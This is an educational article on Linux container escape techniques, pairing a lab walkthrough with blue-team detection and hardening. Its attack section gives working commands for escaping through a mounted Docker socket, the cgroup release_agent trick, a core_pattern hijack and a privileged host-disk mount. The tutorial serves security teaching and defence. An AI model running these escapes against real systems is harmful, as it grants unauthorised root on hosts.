Breaking Out: A Practical Guide to Linux Container Escape Techniques


Disclaimer: This article is for education and authorized security testing only. Run these techniques exclusively against systems you own or have explicit, written permission to test. Container escape on production infrastructure without authorization is illegal and unethical.

Introduction / Overview

Containers are often mistaken for strong security boundaries. They are not. A container is an ordinary Linux process wrapped in namespaces, cgroups, and capability restrictions, and every container on a machine shares the host kernel. When a workload is misconfigured (or an attacker chains a kernel bug), that "boundary" dissolves and you land on the host as root.

In this article you'll learn the most reliable, real-world container escape primitives: the privileged container, abusing a host mount, the classic cgroups release_agent trick, leaking host context through /proc, and what CAP_SYS_ADMIN actually unlocks. We'll walk through a reproducible lab, then give the blue team equal time with concrete detection and hardening guidance.

How it works / Background

A container's isolation rests mainly on three kernel features, with seccomp and an LSM (AppArmor or SELinux) adding syscall and access filtering on top:

  • Namespaces (pid, net, mnt, uts, ipc, user, cgroup) give the process a private view of system resources.
  • cgroups limit and account for resource usage (CPU, memory, devices).
  • Capabilities slice root's powers into ~40 distinct bits. A default Docker container drops dangerous ones like CAP_SYS_ADMIN and CAP_SYS_MODULE.
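Namespaces are easy to see from a shell: each one is a symlink under /proc/<pid>/ns whose target names the namespace type and an inode number, and two processes share a namespace exactly when those targets match. A minimal sketch, assuming bash on Linux; list_namespaces is a hypothetical helper name:

```shell
#!/usr/bin/env bash
# Print the namespace identifiers of a process (default: this shell).
# Each entry in /proc/<pid>/ns is a symlink such as "mnt:[<inode number>]";
# two processes share a namespace exactly when the targets match.
list_namespaces() {
  local pid=${1:-$BASHPID} ns
  for ns in /proc/"$pid"/ns/*; do
    # ${ns##*/} strips the directory, leaving the namespace type (mnt, pid, ...)
    printf '%s %s\n' "${ns##*/}" "$(readlink "$ns")"
  done
}

list_namespaces
```

Run it on the host and inside a container and compare the lines; a type whose number is identical in both (for example pid under --pid=host) is shared with the host.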

Escape happens when one of these guardrails is removed or abused:

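  • --privileged removes most of them: the full capability set, no seccomp or AppArmor confinement, and host devices exposed under /dev. Namespaces stay in place, but with that much power they are easy to step around.
  • A host path bind-mounted into the container (e.g. -v /:/host) hands you the host filesystem directly, and a mounted Docker socket hands you the Docker daemon, which will create such a mount on request.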
  • CAP_SYS_ADMIN lets you call mount(2), manipulate cgroups, and set up the release_agent escape.
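  • /proc exposes host-global knobs such as /proc/sys/kernel/core_pattern (writable when /proc/sys is not mounted read-only, as under --privileged) and shows host processes when the PID namespace is shared (--pid=host).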
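Two of these gaps, missing seccomp/AppArmor confinement and a writable /proc/sys, can be checked from inside a container with nothing but procfs. A minimal sketch, assuming bash on Linux; seccomp_mode_name is a hypothetical helper, and /proc/self/attr/current only carries a meaningful label on AppArmor or SELinux hosts:

```shell
#!/usr/bin/env bash
# Sketch: report seccomp mode, LSM label, and /proc/sys writability.

# Map the numeric "Seccomp:" field of /proc/<pid>/status to a name.
seccomp_mode_name() {
  case "$1" in
    0) echo "disabled" ;;   # no filter: typical of --privileged or seccomp=unconfined
    1) echo "strict" ;;
    2) echo "filter" ;;     # a BPF filter such as Docker's default profile
    *) echo "unknown" ;;
  esac
}

if [ -r /proc/self/status ]; then
  mode=$(awk '/^Seccomp:/ {print $2}' /proc/self/status)
  echo "seccomp: $(seccomp_mode_name "$mode")"

  # AppArmor shows e.g. "docker-default (enforce)"; "unconfined" means no profile.
  # stderr is redirected first so a missing or unreadable file stays silent.
  label=$(tr -d '\0' 2>/dev/null < /proc/self/attr/current)
  echo "lsm label: ${label:-none}"

  # access(2) reports EROFS for write checks on a read-only mount, so -w is
  # false when /proc/sys is mounted read-only (the Docker default).
  if [ -w /proc/sys/kernel/core_pattern ]; then
    echo "/proc/sys: writable"
  else
    echo "/proc/sys: read-only or not writable by this user"
  fi
fi
```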

Prerequisites / Lab setup

You need a Linux host with Docker and root inside the test container. Spin up a deliberately weak target:

# Privileged container (worst case)
docker run --rm -it --privileged --name escape-lab ubuntu:22.04 bash

# Or: capability-only target
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined \
  ubuntu:22.04 bash

Inside the container, confirm what you're working with:

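# What capabilities do we have? (capsh ships in libcap2-bin: apt-get install -y libcap2-bin)
capsh --print | grep sys_admin

# Are we privileged? Host disks (sda, nvme0n1, ...) listed under /dev are a strong hint.
ls /dev

# Read the effective capability set straight from procfs
grep CapEff /proc/self/status
# CapEff: 000001ffffffffff  -> every capability present, as under --privileged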

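capsh --decode=000001ffffffffff translates the mask into capability names. On kernels 5.9 and later, 000001ffffffffff means all 41 capabilities are present; older kernels define fewer capabilities, so their full mask is shorter (for example 0000003fffffffff before 5.8).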
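If capsh is not installed, the mask can be decoded with shell arithmetic. A minimal sketch, assuming bash; has_cap is a hypothetical helper, and the bit numbers come from linux/capability.h. For comparison, a default Docker container typically reports CapEff 00000000a80425fb, which has bit 21 (CAP_SYS_ADMIN) clear:

```shell
#!/usr/bin/env bash
# Sketch: test capability bits in a CapEff/CapBnd mask without capsh.
# Bit numbers are from linux/capability.h; only a few are listed here.
CAP_SYS_MODULE=16
CAP_SYS_PTRACE=19
CAP_SYS_ADMIN=21

# has_cap MASK BIT: succeed if BIT is set in the hexadecimal MASK.
has_cap() {
  local mask=$((16#$1))
  (( (mask >> $2) & 1 ))
}

if [ -r /proc/self/status ]; then
  eff=$(awk '/^CapEff:/ {print $2}' /proc/self/status)
  for cap in CAP_SYS_ADMIN CAP_SYS_MODULE CAP_SYS_PTRACE; do
    # ${!cap} expands to the bit number stored in the variable named by $cap.
    if has_cap "$eff" "${!cap}"; then
      echo "$cap: present"
    else
      echo "$cap: absent"
    fi
  done
fi
```

For example, has_cap 00000000a80425fb 21 fails while has_cap 000001ffffffffff 21 succeeds. The same helper works on the CapBnd and CapPrm lines of any /proc/<pid>/status you can read.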

Attack walkthrough / PoC

1. The mounted Docker socket

One of the most common findings. If /var/run/docker.sock is mounted into the container, you control the host's Docker daemon and can launch a new container that bind-mounts the host root filesystem:

# Detect it
ls -la /var/run/docker.sock

# If the docker CLI is present:
docker run -v /:/host --rm -it alpine chroot /host sh
# You are now root on the host filesystem.
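The ls check above only shows that a path exists. A slightly stricter check confirms it is a Unix socket and, if curl is available, asks the Engine API for its version, which shows the socket is usable even without the docker CLI. A minimal sketch, assuming bash and the conventional /var/run/docker.sock path; docker_sock_exposed is a hypothetical helper name:

```shell
#!/usr/bin/env bash
# Sketch: is a Docker Engine API socket exposed to this process?
# /var/run/docker.sock is the conventional path; some hosts use /run/docker.sock.

# docker_sock_exposed PATH: succeed only if PATH is a Unix socket.
docker_sock_exposed() {
  [ -S "${1:-/var/run/docker.sock}" ]
}

sock=/var/run/docker.sock
if docker_sock_exposed "$sock"; then
  echo "Docker socket present at $sock"
  # curl can talk to the Engine API without the docker CLI.
  # GET /version is read-only, so it is a low-impact reachability probe.
  if command -v curl >/dev/null 2>&1; then
    curl --silent --unix-socket "$sock" http://localhost/version
    echo
  fi
else
  echo "no Docker socket at $sock"
fi
```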

2. cgroups release_agent escape (needs CAP_SYS_ADMIN)

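The classic notify_on_release / release_agent technique. With CAP_SYS_ADMIN (and AppArmor unconfined, as in the lab container) you can mount a cgroup v1 hierarchy (the PoC below uses the rarely used rdma controller), set its release_agent, and have the kernel execute that program as root on the host when the last task leaves a child cgroup. Because the kernel runs the agent from the host's context, release_agent must hold the payload's path on the host filesystem, which the PoC derives from the container's overlay upperdir.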

# Mount a cgroup controller we control
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp
mkdir /tmp/cgrp/x

# Enable release notification
echo 1 > /tmp/cgrp/x/notify_on_release

# Find the container's root directory on the host: the overlay "upperdir" option
host_path=$(sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /etc/mtab | head -1)

# Point release_agent at a script on the HOST filesystem
echo "$host_path/cmd" > /tmp/cgrp/release_agent

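# Drop the payload. EOF is unquoted so $host_path expands now; the
# kernel runs the script later without this shell's variables.
cat > /cmd <<EOF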
#!/bin/sh
ps aux > "$host_path/output"
EOF
chmod a+x /cmd

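# Trigger: a short-lived process joins cgroup x and exits, leaving it empty,
# so the kernel runs release_agent as root on the host
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
sleep 1   # the agent runs asynchronously

# The agent wrote into the container's upperdir, so the host process list is visible here
cat /output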

Note: release_agent is a cgroup v1 feature. Many modern distros default to cgroup v2 (the unified hierarchy), which has no release_agent file, so this path is much less likely to work there. Check the host's cgroup layout when scoping an engagement.
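Checking the layout first saves time. A minimal sketch, assuming GNU coreutils stat, whose -f mode prints the filesystem type with %T; cgroup_layout is a hypothetical helper. A hybrid host (v1 controllers plus a v2 mount under /sys/fs/cgroup/unified) reports v1 here, because /sys/fs/cgroup itself is a tmpfs:

```shell
#!/usr/bin/env bash
# Sketch: report which cgroup layout is mounted at /sys/fs/cgroup.
# Uses GNU stat's filesystem mode (-f); %T prints the filesystem type name.
cgroup_layout() {
  local root=${1:-/sys/fs/cgroup}
  case "$(stat -fc %T "$root" 2>/dev/null)" in
    cgroup2fs) echo "v2" ;;        # unified hierarchy: no release_agent file
    tmpfs)     echo "v1" ;;        # v1 or hybrid: one mount per controller
    *)         echo "unknown" ;;
  esac
}

echo "cgroup layout: $(cgroup_layout)"
```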

3. core_pattern via /proc (needs a writable /proc/sys, e.g. --privileged)

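/proc/sys/kernel/core_pattern is a host-global setting. If it is writable from the container, a leading | makes the kernel pipe every core dump to the named program, which runs as root on the host. As with release_agent, the path must be valid on the host filesystem: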

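# host_path is the container's overlay upperdir on the host (see the sed lookup in step 2);
# the kernel runs the handler from the host's context, so it needs a host path.
echo "|$host_path/handler %P" > /proc/sys/kernel/core_pattern
# Then trigger a segfault in a process to invoke the handler.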
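Defenders can watch for exactly this change. A minimal sketch, assuming bash; check_core_pattern and the allowlist are hypothetical, and the handler paths listed are the usual systemd-coredump and apport locations, which vary by distro:

```shell
#!/usr/bin/env bash
# Sketch: flag a piped core_pattern whose handler is not on an allowlist.
# The allowlist entries are assumptions; adjust them to your distro.
ALLOWED_HANDLERS="/usr/lib/systemd/systemd-coredump /lib/systemd/systemd-coredump /usr/share/apport/apport"

# check_core_pattern PATTERN: print a verdict for one core_pattern value.
check_core_pattern() {
  local pattern=$1 handler
  case "$pattern" in
    '|'*)
      # Drop the leading pipe, then keep the first word (the program path).
      handler=${pattern#\|}
      handler=${handler%% *}
      case " $ALLOWED_HANDLERS " in
        *" $handler "*) echo "ok: piped to known handler $handler" ;;
        *) echo "ALERT: piped to unexpected handler $handler" ;;
      esac
      ;;
    *) echo "ok: core files written to '$pattern'" ;;
  esac
}

if [ -r /proc/sys/kernel/core_pattern ]; then
  check_core_pattern "$(cat /proc/sys/kernel/core_pattern)"
fi
```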

4. Privileged: mount the host disk directly

With --privileged, host block devices are visible. Just mount the root partition:

fdisk -l                       # enumerate host disks (or cat /proc/partitions if fdisk is absent)
mkdir /mnt/host
mount /dev/sda1 /mnt/host      # or the relevant root partition
chroot /mnt/host               # full host root shell
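From the defender side, the clearest signal of this exposure is a host disk that has a device node inside the container. /proc/partitions is generally not virtualized per container, so it lists the host's disks even in an unprivileged container; only a privileged container (or one given --device) normally has matching nodes in /dev. A minimal sketch, assuming bash, to run inside the container; visible_block_devices is a hypothetical helper:

```shell
#!/usr/bin/env bash
# Sketch: list block devices from /proc/partitions that also have a node in /dev.

# visible_block_devices [DEV_DIR]: print each partition name with a block node.
visible_block_devices() {
  local dev_dir=${1:-/dev}
  # Skip the header and blank line; the 4th column is the device name.
  awk 'NR > 2 && NF == 4 {print $4}' /proc/partitions 2>/dev/null |
    while read -r name; do
      [ -b "$dev_dir/$name" ] && echo "$name"
    done
  return 0
}

devs=$(visible_block_devices)
if [ -n "$devs" ]; then
  echo "block devices reachable through /dev:"
  echo "$devs"
else
  echo "no block devices reachable through /dev"
fi
```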

5. Known CVEs worth remembering

  • CVE-2019-5736 — overwriting the host runc binary from inside a container, leading to root on the host.
  • CVE-2022-0492 — cgroups v1 release_agent escape achievable from an unprivileged container in certain configs because the capability check was missing.
  • CVE-2024-21626 — runc file-descriptor leak (WORKDIR / leaked fd) enabling escape during docker build/run.

Mermaid diagram

[Diagram 1: container escape paths to host root]

The diagram shows four escape paths — Docker socket, privileged disk mount, CAP_SYS_ADMIN abuse, and runc CVEs — all converging on root code execution on the host.

Detection & Defense (Blue Team)

Defense matters as much as the attack. Apply these in layers.

1. Never run --privileged; drop capabilities by default.

docker run --cap-drop=ALL --cap-add=NET_BIND_SERVICE \
  --security-opt no-new-privileges \
  --read-only myimage

In Kubernetes, enforce this with Pod Security Standards (restricted) or an admission controller:

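# Container-level securityContext; the restricted profile also requires runAsNonRoot and seccompProfile
securityContext:
  privileged: false
  allowPrivilegeEscalation: false
  readOnlyRootFilesystem: true
  runAsNonRoot: true
  seccompProfile:
    type: RuntimeDefault
  capabilities:
    drop: ["ALL"]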

2. Never mount the Docker socket into a workload. If a build system needs Docker, use rootless mode, Kaniko, or BuildKit instead.

3. Keep seccomp and AppArmor/SELinux enabled. Docker's default seccomp profile blocks mount(2), unshare(2), kernel module loading, and dozens of other syscalls used in escapes unless the matching capability is explicitly granted. Treat --security-opt apparmor=unconfined and --security-opt seccomp=unconfined as red flags in audits.

4. Use user namespaces / rootless containers so in-container root maps to an unprivileged host UID.

5. Patch runc, containerd, and the kernel. CVE-2019-5736 and CVE-2024-21626 were both fixed in runc, so pin a minimum version: runc 1.1.12 or later includes both fixes.
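A pinned minimum is easy to enforce in a host check. A minimal sketch, assuming bash, GNU sort -V, and that runc --version prints "runc version X.Y.Z" on its first line; version_at_least is a hypothetical helper, and 1.1.12 is used as the floor because it is the release that fixed CVE-2024-21626:

```shell
#!/usr/bin/env bash
# Sketch: check that the installed runc meets a minimum version.
MIN_RUNC=1.1.12   # assumed floor: the CVE-2024-21626 fix release

# version_at_least HAVE WANT: succeed if HAVE >= WANT in version-sort order.
version_at_least() {
  [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n1)" = "$2" ]
}

if command -v runc >/dev/null 2>&1; then
  # First line looks like "runc version 1.1.12".
  have=$(runc --version | awk 'NR == 1 {print $3}')
  if version_at_least "$have" "$MIN_RUNC"; then
    echo "runc $have is at or above $MIN_RUNC"
  else
    echo "runc $have is older than $MIN_RUNC: upgrade"
  fi
fi
```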

6. Detection at runtime. Deploy Falco with rules that fire on escape behavior:

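- rule: Detect release_agent File Container Escapes
  desc: Write to a cgroup release_agent file from inside a container
  # open_write and container are macros from Falco's default ruleset
  condition: open_write and container and fd.name endswith release_agent
  output: "Possible cgroup escape (file=%fd.name proc=%proc.cmdline container=%container.id)"
  priority: CRITICAL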

Falco's default ruleset already flags "Launch Privileged Container", "Mount Launched in Privileged Container", and writes to sensitive /proc paths. Pair this with auditd watches on core_pattern and release_agent, scan manifests and Dockerfiles in CI with trivy config, and check cluster configuration against the CIS Kubernetes Benchmark with kube-bench.

7. Audit for the markers an attacker looks for: mounted docker.sock, hostPath volumes, hostPID: true, and CAP_SYS_ADMIN. These map to MITRE ATT&CK T1611 — Escape to Host.
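On a single Docker host, the same markers can be pulled from docker inspect. A minimal sketch, assuming bash, the docker CLI, and access to the daemon; flag_container is a hypothetical helper, and the template fields (HostConfig.Privileged, HostConfig.PidMode, HostConfig.CapAdd, Mounts[].Source) come from the container inspect output. Kubernetes clusters need the equivalent checks against pod specs instead:

```shell
#!/usr/bin/env bash
# Sketch: flag escape-prone settings on running Docker containers.

# flag_container NAME PRIVILEGED PIDMODE CAPADD MOUNT_SOURCES
# Prints one finding per risky setting; prints nothing for a clean container.
flag_container() {
  local name=$1 privileged=$2 pidmode=$3 capadd=$4 mounts=$5
  if [ "$privileged" = "true" ]; then echo "$name: runs --privileged"; fi
  if [ "$pidmode" = "host" ]; then echo "$name: shares the host PID namespace"; fi
  case "$capadd" in
    *SYS_ADMIN*) echo "$name: adds CAP_SYS_ADMIN" ;;
    *ALL*)       echo "$name: adds ALL capabilities" ;;
  esac
  # Pad with spaces so each mount source is matched as a whole word.
  case " $mounts " in
    *" /var/run/docker.sock "*|*" /run/docker.sock "*) echo "$name: mounts the Docker socket" ;;
  esac
  case " $mounts " in
    *" / "*) echo "$name: bind-mounts the host root" ;;
  esac
}

if command -v docker >/dev/null 2>&1; then
  docker ps -q 2>/dev/null | while read -r id; do
    docker inspect --format '{{.Name}}|{{.HostConfig.Privileged}}|{{.HostConfig.PidMode}}|{{.HostConfig.CapAdd}}|{{range .Mounts}}{{.Source}} {{end}}' "$id" |
      while IFS='|' read -r name priv pid caps mounts; do
        flag_container "$name" "$priv" "$pid" "$caps" "$mounts"
      done
  done
fi
```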

For related lateral movement and privilege concepts, see Linux privilege escalation techniques, Kubernetes RBAC abuse, and Docker security hardening.

Conclusion

Container escape is almost always a configuration problem, not a kernel-bug problem. Four primitives account for most real-world breakouts: privileged mode, host mounts (especially docker.sock), CAP_SYS_ADMIN-driven cgroup and /proc abuse, and unpatched runc. As an attacker, enumerate capabilities and mounts first. As a defender, drop capabilities, forbid the socket, keep seccomp/AppArmor on, patch runc, and watch for escape signatures with Falco. Treat the container as one layer of defense, never the only one.
